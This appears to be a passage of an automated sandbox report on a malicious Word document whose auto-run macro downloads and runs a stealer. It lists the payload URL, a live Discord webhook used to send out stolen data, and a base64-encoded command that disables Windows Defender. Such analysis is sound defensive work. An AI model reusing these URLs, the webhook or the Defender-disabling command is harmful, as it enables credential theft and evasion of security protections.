                  Source: winword.exeMemory has grown: Private usage: 1MB later: 90MB

                  Networking

                  barindex
                  Suricata IDS alerts for network traffic
                  Source: Network trafficSuricata IDS: 2827578 - Severity 1 - ETPRO MALWARE Likely Dropper Doc GET to .moe TLD : 192.168.2.4:49735 -> 108.181.20.35:443
                  Source: global trafficHTTP traffic detected: GET /json/?fields=225545 HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                  Source: Joe Sandbox ViewIP Address: 162.159.136.232 162.159.136.232
                  Source: Joe Sandbox ViewIP Address: 108.181.20.35 108.181.20.35
                  Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
                  Source: Joe Sandbox ViewJA3 fingerprint: 6271f898ce5be7dd52b0fc260d0662b3
                  Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                  Source: unknownDNS query: name: ip-api.com
                  Source: global trafficHTTP traffic detected: GET /b5uubc.zip HTTP/1.1Accept: */*Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: files.catbox.moeConnection: Keep-Alive
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: global trafficHTTP traffic detected: GET /b5uubc.zip HTTP/1.1Accept: */*Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: files.catbox.moeConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /json/?fields=225545 HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                  Source: global trafficDNS traffic detected: DNS query: files.catbox.moe
                  Source: global trafficDNS traffic detected: DNS query: ip-api.com
                  Source: global trafficDNS traffic detected: DNS query: discord.com
                  Source: unknownHTTP traffic detected: POST /api/webhooks/1307747947399741462/ke8UE548A61Hf_m1cpanGTjUrsXfghQotpegEAB6XvUfFSq5b5Q9claDeBbFwCxoUc2f HTTP/1.1Accept: application/jsonUser-Agent: Opera/9.80 (Windows NT 6.1; YB/4.0.0) Presto/2.12.388 Version/12.17Content-Type: application/json; charset=utf-8Host: discord.comContent-Length: 885Expect: 100-continueConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 26 Nov 2024 03:20:16 GMTContent-Type: application/jsonContent-Length: 45Connection: closeCache-Control: public, max-age=3600, s-maxage=3600strict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 4x-ratelimit-reset: 1732591217x-ratelimit-reset-after: 1via: 1.1 googlealt-svc: h3=":443"; ma=86400CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7GSBH09IdxaaBiw1VR7CuhccLRNDUwKSFPNHw24%2B41Md4lfiOqYYyQJGscUro%2Bxy%2FaYjZpNmdv6NrRunjZzvUkYcr6BzAMgOrLIK4g8x0gyowmeQlta3ssNTWBYk"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffSet-Cookie: __cfruid=64cd4db9c25784106b9f40645da79d12cd6a52ca-1732591216; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: _cfuvid=93OUJmd_xmOIVIokl09v3nXuiN54N5ZOLQSYpDItJMI-1732591216230-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8e86bddb88a05e79-EWR{"message": "Unknown Webhook", "code": 10015}
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 26 Nov 2024 03:20:18 GMTContent-Type: application/jsonContent-Length: 45Connection: closeCache-Control: public, max-age=3600, s-maxage=3600strict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 4x-ratelimit-reset: 1732591219x-ratelimit-reset-after: 1via: 1.1 googlealt-svc: h3=":443"; ma=86400CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RpPm6xQP0yehcf7yKFdrtIQx1Sfj9YmB9lhUA%2Fp2uiBBALVYNR9qEJF2xCbVe5TuKR7OdPlP%2Fw3jNGkIqHKo0qzQjiRVfjNSkYU1prRuMsl4HdqLDus%2FgkhFe%2FiY"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Server: cloudflareCF-RAY: 8e86bde869a4427f-EWR{"message": "Unknown Webhook", "code": 10015}
                  Source: powershell.exe, 00000019.00000002.2053127263.0000023BE3755000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft)
                  Source: vhcst.exe, 00000006.00000002.2223963813.0000021F83A7F000.00000004.00000800.00020000.00000000.sdmp, vhcst.exe, 00000006.00000002.2223963813.0000021F83AB5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://discord.com
                  Source: vhcst.exe, 00000006.00000002.2223963813.0000021F8395B000.00000004.00000800.00020000.00000000.sdmp, vhcst.exe, 00000006.00000002.2223963813.0000021F839FC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com
                  Source: vhcst.exe, 00000004.00000000.1769853932.0000023FBA422000.00000002.00000001.01000000.00000003.sdmp, vhcst.exe, 00000006.00000002.2223963813.0000021F839EB000.00000004.00000800.00020000.00000000.sdmp, SYTv5.scr.6.drString found in binary or memory: http://ip-api.com/json/?fields=225545
                  Source: vhcst.exe, 00000006.00000002.2223963813.0000021F839EB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/json/?fields=225545P
                  Source: vhcst.exe, 00000004.00000000.1769853932.0000023FBA422000.00000002.00000001.01000000.00000003.sdmp, SYTv5.scr.6.drString found in binary or memory: http://ip-api.com/line/?fields=hostingI7AB5C494-39F5-4941-9163-47F54D6D5016I032E02B4-0499-05C3-0806-
                  Source: powershell.exe, 00000007.00000002.1863497642.000002C110075000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1966120315.000002D2B56E7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2023290691.000002D2C3FD6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2023290691.000002D2C3E9F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2053945057.0000023BE6A88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2152970287.0000023BF5286000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2152970287.0000023BF5143000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                  Source: powershell.exe, 00000019.00000002.2053945057.0000023BE5303000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                  Source: powershell.exe, 00000007.00000002.1848334115.000002C100229000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                  Source: vhcst.exe, 00000006.00000002.2223963813.0000021F835B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1848334115.000002C100001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1884173806.000002679FB68000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1966120315.000002D2B3E21000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2053945057.0000023BE50D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: powershell.exe, 00000007.00000002.1848334115.000002C100229000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                  Source: powershell.exe, 00000015.00000002.1966120315.000002D2B52BF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                  Source: powershell.exe, 00000019.00000002.2053945057.0000023BE5303000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                  Source: powershell.exe, 00000007.00000002.1871870926.000002C17F9FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.mic.B
                  Source: powershell.exe, 00000007.00000002.1848334115.000002C100001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1884173806.000002679FB28000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1884173806.000002679FB41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1966120315.000002D2B3E21000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2053945057.0000023BE50D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                  Source: powershell.exe, 00000019.00000002.2152970287.0000023BF5143000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                  Source: powershell.exe, 00000019.00000002.2152970287.0000023BF5143000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                  Source: powershell.exe, 00000019.00000002.2152970287.0000023BF5143000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                  Source: vhcst.exe, 00000006.00000002.2223963813.0000021F83A7B000.00000004.00000800.00020000.00000000.sdmp, vhcst.exe, 00000006.00000002.2223963813.0000021F83A7F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://discord.com
                  Source: SYTv5.scr.6.drString found in binary or memory: https://discord.com/api/v10/users/
                  Source: vhcst.exe, 00000004.00000002.1786281356.0000023FBC0F1000.00000004.00000800.00020000.00000000.sdmp, vhcst.exe, 00000006.00000002.2223963813.0000021F835B1000.00000004.00000800.00020000.00000000.sdmp, vhcst.exe, 00000006.00000002.2223963813.0000021F83A7F000.00000004.00000800.00020000.00000000.sdmp, vhcst.exe, 00000006.00000002.2223963813.0000021F83AB5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/webhooks/1307747947399741462/ke8UE548A61Hf_m1cpanGTjUrsXfghQotpegEAB6XvUfFSq
                  Source: vhcst.exe, 00000004.00000000.1769853932.0000023FBA422000.00000002.00000001.01000000.00000003.sdmp, SYTv5.scr.6.drString found in binary or memory: https://discordapp.com/api/v9/users/
                  Source: 5QnwxSJVyX.docString found in binary or memory: https://files.catbox.moe/b5uubc.zip
                  Source: powershell.exe, 00000019.00000002.2053945057.0000023BE5303000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                  Source: SYTv5.scr.6.drString found in binary or memory: https://github.com/PyDevOG/Divulge-Stealer
                  Source: vhcst.exe, 00000006.00000002.2223963813.0000021F83A7F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/PyDevOG/Divulge-StealerX
                  Source: powershell.exe, 00000019.00000002.2053945057.0000023BE6574000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
                  Source: powershell.exe, 00000015.00000002.2030774863.000002D2CC2A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://go.microsoft.co
                  Source: vhcst.exe, 00000006.00000002.2223963813.0000021F835B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gstatic.com
                  Source: vhcst.exe, 00000006.00000002.2223963813.0000021F835B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gstatic.com/generate_204
                  Source: vhcst.exe, 00000004.00000000.1769853932.0000023FBA422000.00000002.00000001.01000000.00000003.sdmp, SYTv5.scr.6.drString found in binary or memory: https://gstatic.com/generate_204g==================Divulge
                  Source: powershell.exe, 00000007.00000002.1863497642.000002C110075000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1966120315.000002D2B56E7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2023290691.000002D2C3FD6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2023290691.000002D2C3E9F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2053945057.0000023BE6A88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2152970287.0000023BF5286000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2152970287.0000023BF5143000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                  Source: powershell.exe, 00000015.00000002.1966120315.000002D2B52BF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.org
                  Source: powershell.exe, 00000015.00000002.1966120315.000002D2B52BF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.orgX
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49810
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49809
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49809 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49810 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
                  Source: unknownHTTPS traffic detected: 108.181.20.35:443 -> 192.168.2.4:49735 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 162.159.136.232:443 -> 192.168.2.4:49809 version: TLS 1.2

                  Spam, unwanted Advertisements and Ransom Demands

                  barindex
                  Modifies the hosts file
                  Source: C:\7037005\vhcst.exeFile written: C:\Windows\System32\drivers\etc\hostsJump to behavior

                  System Summary

                  barindex
                  Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
                  Source: screenshotOCR: Enable Editing from the yellow bar Accessibility Mode 5QnwxSJVyX: 230 characters (an approximate va
                  Source: screenshotOCR: Enable Editing from the yellow bar Accessibility Mode Unavailable p Type here to search Add-ins Add
                  Source: screenshotOCR: Enable Editing from the yellow bar Accessibility Mode Unavailable p Type here to search Add-ins Add
                  Document contains an embedded VBA macro which may execute processes
                  Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function DownloadUnzipAndRun, API IWshShell3.Run("C:\7037005\\vhcst.exe")Name: DownloadUnzipAndRun
                  Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function DownloadUnzipAndRun, API IWshShell3.Run("C:\2716439\\vhcst.exe")Name: DownloadUnzipAndRun
                  Document contains an embedded VBA macro with suspicious strings
                  Source: 5QnwxSJVyX.docOLE, VBA macro line: Set objShell = CreateObject("WScript.Shell")
                  Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function DownloadUnzipAndRun, String wscript: Set objShell = CreateObject("WScript.Shell")Name: DownloadUnzipAndRun
                  Document contains an embedded VBA with functions possibly related to ADO stream file operations
                  Source: 5QnwxSJVyX.docStream path 'Macros/VBA/ThisDocument' : found possibly 'ADODB.Stream' functions open, savetofile, write
                  Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function downloadFile, API IServerXMLHTTPRequest2.Open("GET","https://files.catbox.moe/b5uubc.zip",False)Name: downloadFile
                  Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function downloadFile, API Stream.Open()Name: downloadFile
                  Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function downloadFile, API Stream.Write(??\x14\x00\x08?????\x01?\x03\x00??????????????????\xfffd????????????????????????????????????????????????????????????????????????????????????????????????\xfffd???????????????????????????????????????????????????????????????????????????????????????????????????????????????????"??????????????????????+????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????j???????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????T??????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????\xfffd????????????????????3??????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????O?????????????????????????\x7f????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????i????????????????????????????????????????????????????????????X????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????f???????????????????????????\???????????????????????????????????????????????????????????????????????????????\xfffd??????????????????????????????????????????????????????????????????????????????????????+????????????????????????????????????????????????????????????\xfffd??????????t?????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????E??????????????????????????????????????????????????????????????????????\xfffd??????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????{???????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????\xfffd????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????E????????????L??????????????????????????????????????\xfffd?????????????????????????????????????E?????Name: downloadFile
                  Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function downloadFile, found possibly 'ADODB.Stream' functions open, savetofile, writeName: downloadFile
                  Document contains an embedded VBA with functions possibly related to HTTP operations
                  Source: 5QnwxSJVyX.docStream path 'Macros/VBA/ThisDocument' : found possibly 'XMLHttpRequest' functions response, responsebody, status, open, send
                  Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function downloadFile, found possibly 'XMLHttpRequest' functions response, responsebody, status, open, sendName: downloadFile
                  Office process drops PE file
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEFile created: C:\2716439\vhcst.exeJump to dropped file
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEFile created: C:\7037005\vhcst.exeJump to dropped file
                  Office process queries suspicious COM object (likely to drop second stage)
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXECOM Object queried: XML HTTP Request HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{ED8C108E-4349-11D2-91A4-00C04F7969E8}\InProcServer32Jump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXECOM Object queried: ADODB.Stream HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00000566-0000-0010-8000-00AA006D2EA4}\InprocServer32Jump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXECOM Object queried: Shell Automation Service HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{13709620-C279-11CE-A49E-444553540000}\InProcServer32Jump to behavior
                  Source: C:\7037005\vhcst.exeCode function: 6_2_00007FFD99E2BA286_2_00007FFD99E2BA28
                  Source: C:\7037005\vhcst.exeCode function: 6_2_00007FFD99E2BA006_2_00007FFD99E2BA00
                  Source: C:\7037005\vhcst.exeCode function: 6_2_00007FFD99E2B9786_2_00007FFD99E2B978
                  Source: C:\7037005\vhcst.exeCode function: 6_2_00007FFD99E211586_2_00007FFD99E21158
                  Source: C:\7037005\vhcst.exeCode function: 6_2_00007FFD99E300C86_2_00007FFD99E300C8
                  Source: C:\7037005\vhcst.exeCode function: 6_2_00007FFD99E226446_2_00007FFD99E22644
                  Source: C:\7037005\vhcst.exeCode function: 6_2_00007FFD99E5CD706_2_00007FFD99E5CD70
                  Source: C:\7037005\vhcst.exeCode function: 6_2_00007FFD99E63D506_2_00007FFD99E63D50
                  Source: C:\7037005\vhcst.exeCode function: 6_2_00007FFD99E63CD86_2_00007FFD99E63CD8
                  Source: C:\7037005\vhcst.exeCode function: 6_2_00007FFD99E2B7206_2_00007FFD99E2B720
                  Source: C:\7037005\vhcst.exeCode function: 6_2_00007FFD99E47EA06_2_00007FFD99E47EA0
                  Source: C:\7037005\vhcst.exeCode function: 6_2_00007FFD99E309B06_2_00007FFD99E309B0
                  Source: C:\7037005\vhcst.exeCode function: 6_2_00007FFD99E212686_2_00007FFD99E21268
                  Source: C:\7037005\vhcst.exeCode function: 6_2_00007FFD99FD12A56_2_00007FFD99FD12A5
                  Source: C:\7037005\vhcst.exeCode function: 6_2_00007FFD99FE33A26_2_00007FFD99FE33A2
                  Source: C:\7037005\vhcst.exeCode function: 6_2_00007FFD99FD9C386_2_00007FFD99FD9C38
                  Source: C:\7037005\vhcst.exeCode function: 6_2_00007FFD99FE092D6_2_00007FFD99FE092D
                  Source: C:\7037005\vhcst.exeCode function: 6_2_00007FFD99FE518D6_2_00007FFD99FE518D
                  Source: C:\7037005\vhcst.exeCode function: 6_2_00007FFD99FDAEB26_2_00007FFD99FDAEB2
                  Source: C:\7037005\vhcst.exeCode function: 6_2_00007FFD99FDDFEC6_2_00007FFD99FDDFEC
                  Source: C:\7037005\vhcst.exeCode function: 6_2_00007FFD99FD9CE06_2_00007FFD99FD9CE0
                  Source: C:\7037005\vhcst.exeCode function: 6_2_00007FFD99FDFAA56_2_00007FFD99FDFAA5
                  Source: C:\7037005\vhcst.exeCode function: 6_2_00007FFD99FDFB586_2_00007FFD99FDFB58
                  Source: C:\7037005\vhcst.exeCode function: 6_2_00007FFD99FDABF26_2_00007FFD99FDABF2
                  Source: C:\7037005\vhcst.exeCode function: 6_2_00007FFD99FD18986_2_00007FFD99FD1898
                  Source: C:\7037005\vhcst.exeCode function: 6_2_00007FFD99FE18C76_2_00007FFD99FE18C7
                  Source: C:\7037005\vhcst.exeCode function: 6_2_00007FFD99FE095D6_2_00007FFD99FE095D
                  Source: C:\7037005\vhcst.exeCode function: 6_2_00007FFD99FDAA406_2_00007FFD99FDAA40
                  Source: C:\7037005\vhcst.exeCode function: 6_2_00007FFD99FDBF516_2_00007FFD99FDBF51
                  Source: C:\7037005\vhcst.exeCode function: 6_2_00007FFD99FD0FA96_2_00007FFD99FD0FA9
                  Source: C:\7037005\vhcst.exeCode function: 6_2_00007FFD99FE5FF26_2_00007FFD99FE5FF2
                  Source: C:\7037005\vhcst.exeCode function: 6_2_00007FFD99FE2CD86_2_00007FFD99FE2CD8
                  Source: C:\7037005\vhcst.exeCode function: 6_2_00007FFD99FE2D156_2_00007FFD99FE2D15
                  Source: C:\7037005\vhcst.exeCode function: 6_2_00007FFD99FDFD186_2_00007FFD99FDFD18
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_00007FFD99E2745625_2_00007FFD99E27456
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_00007FFD99E2820225_2_00007FFD99E28202
                  Source: 5QnwxSJVyX.docOLE, VBA macro line: Sub Document_Open()
                  Source: 5QnwxSJVyX.docOLE, VBA macro line: Sub AutoOpen()
                  Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function Document_OpenName: Document_Open
                  Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function AutoOpenName: AutoOpen
                  Source: 5QnwxSJVyX.docOLE indicator, VBA macros: true
                  Source: mlaseventheditionofficeonline.xsl.0.drOLE indicator, VBA macros: true
                  Source: APASixthEditionOfficeOnline.xsl.0.drOLE indicator, VBA macros: true
                  Source: chicago.xsl.0.drOLE indicator, VBA macros: true
                  Source: iso690.xsl.0.drOLE indicator, VBA macros: true
                  Source: ieee2006officeonline.xsl.0.drOLE indicator, VBA macros: true
                  Source: harvardanglia2008officeonline.xsl.0.drOLE indicator, VBA macros: true
                  Source: turabian.xsl.0.drOLE indicator, VBA macros: true
                  Source: gostname.xsl.0.drOLE indicator, VBA macros: true
                  Source: iso690nmerical.xsl.0.drOLE indicator, VBA macros: true
                  Source: sist02.xsl.0.drOLE indicator, VBA macros: true
                  Source: gosttitle.xsl.0.drOLE indicator, VBA macros: true
                  Source: gb.xsl.0.drOLE indicator, VBA macros: true
                  Source: 5QnwxSJVyX.docStream path 'Macros/VBA/__SRP_0' : https://files.catbox.moe/b5uubc.zisC:\\b5uubc.zixWScript.Shell\vhcst.exeRunVBE7.DLLRQe1Q"Microsoft.XMLHTTSGETOpenSendStatusADODB.StreamTypeResponseBodyWriteSaveToFileClose pyDESTk4gALtxDEST`PDEST
                  Source: f01b4d95cf55d32a.automaticDestinations-ms.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
                  Source: mlaseventheditionofficeonline.xsl.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
                  Source: APASixthEditionOfficeOnline.xsl.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
                  Source: chicago.xsl.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
                  Source: iso690.xsl.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
                  Source: ieee2006officeonline.xsl.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
                  Source: harvardanglia2008officeonline.xsl.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
                  Source: turabian.xsl.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
                  Source: gostname.xsl.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
                  Source: iso690nmerical.xsl.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
                  Source: sist02.xsl.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
                  Source: gosttitle.xsl.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
                  Source: ~WRF{BAF6D361-EABD-43BD-AF80-06993D3F99C2}.tmp.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
                  Source: gb.xsl.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
                  Source: vhcst.exe.0.dr, -----.csBase64 encoded string: 'U2V0LU1wUHJlZmVyZW5jZSAtRGlzYWJsZUludHJ1c2lvblByZXZlbnRpb25TeXN0ZW0gJHRydWUgLURpc2FibGVJT0FWUHJvdGVjdGlvbiAkdHJ1ZSAtRGlzYWJsZVJlYWx0aW1lTW9uaXRvcmluZyAkdHJ1ZSAtRGlzYWJsZVNjcmlwdFNjYW5uaW5nICR0cnVlIC1FbmFibGVDb250cm9sbGVkRm9sZGVyQWNjZXNzIERpc2FibGVkIC1FbmFibGVOZXR3b3JrUHJvdGVjdGlvbiBBdWRpdE1vZGUgLUZvcmNlIC1NQVBTUmVwb3J0aW5nIERpc2FibGVkIC1TdWJtaXRTYW1wbGVzQ29uc2VudCBOZXZlclNlbmQgJiYgcG93ZXJzaGVsbCBTZXQtTXBQcmVmZXJlbmNlIC1TdWJtaXRTYW1wbGVzQ29uc2VudCAy'
                  Source: vhcst.exe0.0.dr, -----.csBase64 encoded string: 'U2V0LU1wUHJlZmVyZW5jZSAtRGlzYWJsZUludHJ1c2lvblByZXZlbnRpb25TeXN0ZW0gJHRydWUgLURpc2FibGVJT0FWUHJvdGVjdGlvbiAkdHJ1ZSAtRGlzYWJsZVJlYWx0aW1lTW9uaXRvcmluZyAkdHJ1ZSAtRGlzYWJsZVNjcmlwdFNjYW5uaW5nICR0cnVlIC1FbmFibGVDb250cm9sbGVkRm9sZGVyQWNjZXNzIERpc2FibGVkIC1FbmFibGVOZXR3b3JrUHJvdGVjdGlvbiBBdWRpdE1vZGUgLUZvcmNlIC1NQVBTUmVwb3J0aW5nIERpc2FibGVkIC1TdWJtaXRTYW1wbGVzQ29uc2VudCBOZXZlclNlbmQgJiYgcG93ZXJzaGVsbCBTZXQtTXBQcmVmZXJlbmNlIC1TdWJtaXRTYW1wbGVzQ29uc2VudCAy'
                  Source: SYTv5.scr.6.dr, -----.csBase64 encoded string: 'U2V0LU1wUHJlZmVyZW5jZSAtRGlzYWJsZUludHJ1c2lvblByZXZlbnRpb25TeXN0ZW0gJHRydWUgLURpc2FibGVJT0FWUHJvdGVjdGlvbiAkdHJ1ZSAtRGlzYWJsZVJlYWx0aW1lTW9uaXRvcmluZyAkdHJ1ZSAtRGlzYWJsZVNjcmlwdFNjYW5uaW5nICR0cnVlIC1FbmFibGVDb250cm9sbGVkRm9sZGVyQWNjZXNzIERpc2FibGVkIC1FbmFibGVOZXR3b3JrUHJvdGVjdGlvbiBBdWRpdE1vZGUgLUZvcmNlIC1NQVBTUmVwb3J0aW5nIERpc2FibGVkIC1TdWJtaXRTYW1wbGVzQ29uc2VudCBOZXZlclNlbmQgJiYgcG93ZXJzaGVsbCBTZXQtTXBQcmVmZXJlbmNlIC1TdWJtaXRTYW1wbGVzQ29uc2VudCAy'
                  Source: SYTv5.scr.6.dr, -----.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                  Source: SYTv5.scr.6.dr, -----.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: vhcst.exe0.0.dr, -----.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                  Source: vhcst.exe0.0.dr, -----.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
